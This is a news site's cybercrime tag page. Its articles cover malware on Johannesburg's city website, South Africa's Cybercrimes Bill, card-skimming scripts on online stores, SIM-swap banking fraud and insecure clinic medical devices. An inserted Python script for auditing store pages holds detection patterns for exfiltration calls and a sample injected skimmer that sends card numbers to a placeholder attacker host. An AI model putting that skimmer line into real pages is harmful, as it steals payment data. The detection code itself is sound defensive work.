Tag: cybercrime

City of Joburg hit by malware

The City of Johannesburg has said it suspected that malware has infected one of the servers hosting its Web site, causing major downtime last week.

This is just one in a long string of woes for the city.

The billing system, inherited from the ANC when the DA won the metro, has been in crisis for some months. The City tried to fix it by rolling out a new system, which automatically requires payment on the 15th of the month unless ratepayers ask, by e-mail or through the call centre, for it to be the 28th.

As a result of the change in date, as well as a lack of postal notices and SMS notices, many households have unintentionally fallen behind in payment – or worse, have not, but have been cut off anyway. Reinstatement of electricity is a costly and time-consuming exercise, and falling behind on payments can impact credit ratings.

Local councillors instructed their ward members to use the CoJ Web site to ensure they know what they owe and don’t fall behind on payments.

However, the city’s website – https://joburg.org.za/ – was inaccessible through browsers like Google Chrome for almost two days last week, due to a malware warning from Google.

Users attempting to access the site were turned away by Google’s Safe Browsing warning, which stated that the site contains harmful content – including pages that “send visitors to harmful websites”.

The city said it was aware of the issue, and had an investigation underway.

“Preliminary indications suggest that one of the servers hosting the website may be infected with malware. It is also possible that the outage may be a result of corrupted code,” said the City of Johannesburg.

“Fortunately, the city’s customer data has not been compromised as it resides in separate servers.”

According to the ZACR’s records, the City of Johannesburg is the registrant of the domain, while Internet Solutions is the sponsoring registrar.

Although the issues with the site have since been fixed, it leaves many questioning what kind of security is in place for one of the city’s most important databases.

Source: MyBroadband; My Office News

The Deputy Minister of Justice and Constitutional Development, John Jeffery, said the country’s new Cybercrimes and Cybersecurity Bill will be tabled in Parliament soon.

The Bill has already been approved by Cabinet.

“The Bill aims to put in place a coherent and integrated cybersecurity statutory framework to address various shortcomings which exist in dealing with cybercrime and cybersecurity in the country,” stated the SA Government website.

The purpose of the Cybercrimes and Cybersecurity Bill is to:

  • Create offences and prescribe penalties;
  • Further regulate jurisdiction;
  • Further regulate the powers to investigate, search and gain access to or seize items;
  • Further regulate aspects of international cooperation in respect of the investigation of cybercrime;
  • Provide for the establishment of a 24/7 point of contact;
  • Provide for the establishment of various structures to deal with cybersecurity;
  • Regulate the identification and declaration of National Critical Information Infrastructures and provide for measures to protect National Critical Information Infrastructures;
  • Further regulate aspects relating to evidence;
  • Impose obligations on electronic communications service providers regarding aspects which may impact on cybersecurity;
  • Provide that the President may enter into agreements with foreign States to promote cybersecurity; and
  • Repeal and amend certain laws.

How it will affect you

Michalsons law firm has published an overview of the Cybercrimes and Cybersecurity Bill, explaining why we need it and who will be affected by it. The bill is aimed at keeping South Africans safe from cybercrime and consolidates the country’s cybercrime laws into one place.

People who will be affected by the new bill include “everyone who uses a computer or the Internet”, along with:

  • People involved with IT or POPI compliance;
  • Electronic Communications Service Providers;
  • Providers of software or hardware tools that could be used to commit offences;
  • Financial services providers;
  • Owners of copyrights and pirates;
  • Information Security experts; and
  • Anyone who owns an Information Infrastructure that Government could declare as critical.

What the bill deals with

The bill creates around 50 new offences, which are related to data, messages, computers, and networks, said Michalsons.

These offences include:

  • Using personal information or financial information to commit an offence;
  • Hacking;
  • Unlawful interception of data;
  • Computer-related forgery and uttering; and
  • Extortion or terrorist activity.

The penalties for these offences range from 1 to 10 years’ imprisonment or a fine of up to R10 million.

The bill also aims to protect critical infrastructure of a strategic nature from interference and disruption.

This infrastructure includes that which aids in keeping the country’s security, defence, and law enforcement operational; and provides essential services.

Powers to investigate

“The Cybercrimes and Cybersecurity Bill gives the South African Police and the State Security Agency extensive powers to investigate, search, access, and seize just about anything – like a computer, database, or network,” said Michalsons.

As part of the requirements of the bill, the Minister of Police must establish a National Cybercrime Centre and a Cyber Response Committee, of which the chairperson will be the Director-General: State Security.

The Minister of Defence must also establish and operate a Cyber Command, while the Minister of Telecommunications and Postal Services must establish a Cyber Security Hub.

Source: www.mybroadband.co.za

Hackers have installed credit card skimming scripts on thousands of online stores, including numerous South African platforms, according to a recent article by MyBroadband.

An investigation by Dutch developer Willem de Groot revealed that a host of online stores have been compromised and are stealing users’ credit card details.

De Groot says hackers gained access to the source code using unpatched security flaws.

Once a store is under the control of a cybercriminal, a JavaScript wiretap is installed that funnels live payment data to an offshore collection server (mostly in Russia).

“This wiretap operates transparently for customers and the merchant. Skimmed credit cards are then sold on the dark Web,” says De Groot.

He adds that online skimming is very effective, because it is hard to detect and it is near impossible to trace the thieves.

International online stores

According to De Groot’s research, more than 750 online stores that were unwittingly skimming payment card details for attackers in 2015 are still doing so today, showing that this type of activity can go undetected for months.

De Groot’s data suggests there are multiple groups engaged in online skimming. While in 2015 there were variants of the same malware code, today there are three distinct malware families with a total of nine variants.

“The first malware just intercepted pages that had checkout in the URL,” he says.

“Newer versions also check for popular payment plugins such as Fire Checkout, One Step Checkout, and PayPal.”

The malicious code is obfuscated and is deployed using known vulnerabilities in content management solutions or e-commerce software that Web site owners have failed to patch.

What’s worse is that some shop owners don’t seem to grasp the seriousness of these issues or understand their impact. De Groot gives some examples of the worst answers he has received from companies when he attempted to inform them about the compromises.

“We don’t care; our payments are handled by a third party payment provider,” one unnamed shop owner says.

“Our shop is safe because we use HTTPS,” says another.

While HTTPS protects against man-in-the-middle attacks, where the attacker is in a position on the network to intercept traffic between a user and a server, malicious code runs on the server itself and is served over HTTPS, so it can see whatever information users enter into Web sites.

As for using a third-party payment processor, “if someone can inject JavaScript into your site, your database is most likely also hacked”, De Groot says.
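The point above about HTTPS and third-party processors is that the wiretap is part of the page the merchant itself serves, so the merchant has to look for it in its own HTML rather than rely on transport encryption. The following is an added example, not code from the article or from De Groot: a small Python audit over a constructed store page that flags scripts loaded from hosts outside the merchant’s allowlist, and inline scripts that read payment fields and hand data to a host that is not on that list (the hostnames, field names and sample page are all assumptions).

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names a skimmer must read, and the browser primitives it uses to ship data off-site.
PAYMENT_HINTS = ("checkout", "cc_number", "cardnumber", "cvv", "cvc", "expir")
EXFIL_HINTS = ("XMLHttpRequest", "fetch(", "sendBeacon", ".src=", "newImage(")
URL_RE = re.compile(r"""https?://[^\s'"<>()]+""")

class _ScriptCollector(HTMLParser):
    """Collects <script src=...> URLs and inline <script> bodies from a page."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script" and dict(attrs).get("src"):
            self.external.append(dict(attrs)["src"])
        elif tag == "script":
            self._in_script = True
            self.inline.append("")

    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"

    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data

def collect_scripts(html):
    parser = _ScriptCollector()
    parser.feed(html)
    return parser.external, parser.inline

def _host(url):
    return (urlparse(url).hostname or "").lower()

def audit_scripts(html, allowed_hosts):
    """Return findings: external scripts from hosts off the allowlist, and inline scripts
    that read payment fields, use an exfiltration primitive and name a foreign host."""
    external, inline = collect_scripts(html)
    findings = [("external-script", _host(s)) for s in external
                if _host(s) and _host(s) not in allowed_hosts]
    for body in inline:
        compact = re.sub(r"\s+", "", body)  # defeat trivial spacing tricks before matching
        foreign = {_host(u) for u in URL_RE.findall(body)} - set(allowed_hosts)
        if (any(k in compact.lower() for k in PAYMENT_HINTS)
                and any(k in compact for k in EXFIL_HINTS) and foreign):
            findings.append(("inline-skimmer", sorted(foreign)[0]))
    return findings

# Constructed sample page: the store's own checkout script plus an injected wiretap that
# copies the card number field to an off-site collector (all hostnames are placeholders).
SAMPLE_PAGE = """<script src="https://cdn.example-store.co.za/checkout.js"></script>
<form id="checkout"><input name="cc_number"><input name="cvv"></form>
<script>document.getElementById('checkout').addEventListener('submit', function () {
  new Image().src = 'https://collector.example-attacker.invalid/?c=' + this.cc_number.value;
});</script>"""
ALLOWED_HOSTS = {"example-store.co.za", "cdn.example-store.co.za"}
```

Running `audit_scripts(SAMPLE_PAGE, ALLOWED_HOSTS)` reports the injected inline script and its collector host; heavily obfuscated injections defeat keyword matching, so a hash baseline of known-good inline scripts is the complementary check.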

The good news is that some shop owners are taking action, with 334 stores fixed in a 48-hour period. On the other hand, during the same time period, 170 new stores were hacked.

South African online stores

De Groot published the list of 5 900 compromised stores on GitHub, but it was quickly removed.

“After publishing a list of compromised online stores, I was contacted by several persons who claimed their site had not been compromised, and who threatened to sue me,” says De Groot.

However, De Groot maintains that all of these sites were compromised, pointing to archive.org, which he says “provides solid proof”.

“I have, prior to publication, submitted all URLs and malware samples to Google’s Safe Browsing team. They have since only acted upon a small portion of the sites,” he says.

He says he understands that being included in the list can be painful for a merchant, but this was needed to prevent the problem from growing.

MyBroadband tested the listed South African Web sites, all of which were blocked by anti-malware software or browser warnings, and informed the site owners before publishing the article.

According to MyBroadband, the list of infected sites comprised 18 South African domains.

Source: PC World; MyBroadband

Banking fraud is here to stay

Internet users are contributing to banking and financial fraud by falling victim to cyber-scams designed to steal cash, says a cyber security expert.

While credit card fraud in SA declined by 28,6%, according to the South African Banking Risk Information Centre (Sabric), debit card fraud increased by 8,3% in the year ended 2015.

The organisation also reported that Card Not Present (CNP) fraud increased by 12,6% to account for 75% of losses relating to South African issued credit cards.

“The problem is not that the cyber-criminals are stealing our information, but rather that we are giving it to them,” says Tjaart van der Walt, chief executive of Truteq Group.

“We click on the links in the phishing emails and we install the ‘free’ apps on our mobile phones. This mechanism to get your banking information is more about social engineering than hacking in the old sense,” he adds.

Trojan attacks

Security firm Kaspersky Lab recently reported that cyber-criminals have turned to Trojans designed to steal financial information and install malicious software on both PCs and smartphones.

“Almost every detected threat in South Africa is an advertising Trojan that can use root rights on the phone,” Roman Unuchek, senior malware analyst at Kaspersky Lab USA, recently told Fin24.

Van der Walt says the divergent interests of mobile phone operators and banks – communication on one side and financial security on the other – have left a security gap.

“Using mobile technology to secure financial transactions was not part of the specifications or the intended purpose. Three decades later, mobile telephony has turned out to be indispensable to our way of life and there is now a mobile phone in almost every pocket,” he says.

Banks typically use a one-time PIN (OTP) sent to a customer’s cell phone to secure online transactions. However, mobile operators do not want to expose themselves to additional risk.

“In the delivery of a one-time pin, a mobile network operator has very little (in all likelihood no) legal or financial risk. The terms and conditions of use limit their liability and case law exists to reinforce this position. In fact, a mobile network operator will not want to be associated with the authentication of financial transactions at all,” Van der Walt says.

The fact that many banks send the verification code to the same mobile phone that is used to conduct the transaction may leave customers vulnerable if a cybercriminal has compromised that device.

SIM-swap fraud

“Using the same mobile phone to make a transaction and to verify it [financial transactions], wipes out the benefit of the two-factor authentication. Fraudsters only have to compromise you once in order to break into your bank account and clean it out,” says Van der Walt.

The problem is magnified when customers enact a SIM-swap – or if criminals conduct a fraudulent SIM-swap.

“The identification process followed by a mobile network operator’s call centre agent to verify your identity for the purposes of a SIM swap or network port is as simple as possible. Their interest is to keep us talking and if we cannot make a call, then we cannot talk and consume credit,” says Van der Walt.

“The banks, on the other hand, need the verification process to be as rigorous as possible in order to comply with anti-money laundering and counter-terrorism laws,” he adds.
Van der Walt argues that about 1% of mobile subscribers conduct a SIM swap per month, implying a change in about 870 000 numbers in SA.

While not all mobile subscribers are banking customers, Van der Walt says number porting could place a strain on banks’ ability to keep track of customers.

“Even if a bank had the access to see if a user has ported or not, blocking a transaction purely on the basis of the user changing networks will drive hundreds of thousands of irate customers to their call centres,” he says.

By Duncan Alfreds for Fin24

How safe is your medical information?

A Kaspersky Lab Global Research & Analysis Team (GReAT) expert has conducted real field research at one private clinic in an attempt to explore its security weaknesses and how to address them. Vulnerabilities were found in medical devices that opened a door for cybercriminals to access the personal data of patients and to endanger their physical well-being.

A modern clinic is a complicated system. It has sophisticated medical devices that comprise fully functional computers with an operating system and applications installed on them. Doctors rely on computers, and all information is stored in a digital format. In addition, all healthcare technologies are connected to the Internet. So, it comes as no surprise that both medical devices and hospital IT infrastructure have previously been targeted by hackers. The most recent examples of such incidents are ransomware attacks against hospitals in the US and Canada. But a massive malicious attack is only one way in which criminals could exploit the IT infrastructure of a modern hospital.

Clinics store personal information about their patients. They also own and use very expensive, hard to fix and replace equipment, which makes them a potentially valuable target for extortion and data theft.

The outcome of a successful cyberattack against a medical organisation could differ in detail but will always be dangerous.

It could involve the following:
• The felonious use of personal patient data: the resale of information to third parties or demanding the clinic pay a ransom to get back sensitive information about patients;
• The intentional falsification of patient results or diagnoses;
• Damage to medical equipment, which may cause both physical harm to patients and huge financial losses to a clinic;
• Negative impact on the reputation of a clinic.

Exposure to the Internet

The first thing that a Kaspersky Lab expert decided to explore, while conducting this research, was how many medical devices around the globe are now connected to the Internet. Modern medical devices are fully-functional computers with an operating system, and most of these have a communication channel to the Internet. By hacking them, criminals could interfere with their functionality.

A quick look over the Shodan search engine for Internet-connected devices showed that hundreds of devices – MRI scanners, cardiology equipment, radioactive medical equipment and other related devices – are registered there. This discovery leads to worrisome conclusions: some of these devices still run on old operating systems such as Windows XP, with unpatched vulnerabilities, and some even use default passwords that can be easily found in public manuals.

Using these vulnerabilities, criminals could access a device interface and potentially affect the way it works.

Inside the clinic’s local network

The above-mentioned scenario was one of the ways in which cybercriminals could get access to the clinic’s critical infrastructure. But the most obvious and logical way is to attack its local network. During the research a vulnerability was found in the clinic’s Wi-Fi connection, and access to the local network was gained through a weak communications protocol.

Exploring the clinic’s local network, the Kaspersky Lab expert found some of the medical equipment that had previously been found on Shodan. This time, however, no password at all was needed to get access to the equipment, because the local network was a trusted network for medical equipment applications and users. This is how a cybercriminal can gain access to a medical device.

Further exploring the network, the Kaspersky Lab expert discovered a new vulnerability in a medical device application. A command shell was implemented in the user’s interface that could give cybercriminals access to personal patient information, including their clinical history and information about medical analysis, as well as their addresses and ID details. Moreover, through this vulnerability the whole device controlled with this application could be compromised. For example, among these devices could be MRI scanners, cardiology equipment, radioactive and surgical equipment. Firstly, criminals could alter the way the device works and cause physical damage to the patients. Secondly, criminals could damage the device itself at immense cost to the hospital.

“Clinics are no longer only doctors and medical equipment, but IT services too. The work of a clinic’s internal security services affects the safety of patient data and the functionality of its devices. Medical software and equipment engineers put a lot of effort into creating a useful medical device that will save and protect human life, but they sometimes completely forget about protecting it from unauthorised external access. When it comes to new technologies, safety issues should be addressed at the first stage of the research and development (R&D) process. IT security companies could help at this stage to address safety issues,” says Sergey Lozhkin, senior researcher at Kaspersky Lab’s GReAT.

Kaspersky Lab experts recommend implementing the following measures to protect clinics from unauthorised access:
• Use strong passwords to protect all external connection points;
• Update IT security policies, and develop timely patch management and vulnerability assessments;
• Protect medical equipment applications in the local network with passwords, in case of unauthorised access to the trusted area;
• Protect infrastructure from threats like malware and hacking attacks with a reliable security solution;
• Back up critical information regularly and keep a backup copy offline.

The danger of data leaks

As many companies and institutions have discovered, data breaches are costly – not only in terms of financial losses, but also in terms of reputational damage. A data breach is defined as the intentional or unintentional release of secure information to an environment that is untrusted, such as the Internet.

My Office News Ⓒ 2017 - Designed by A Collective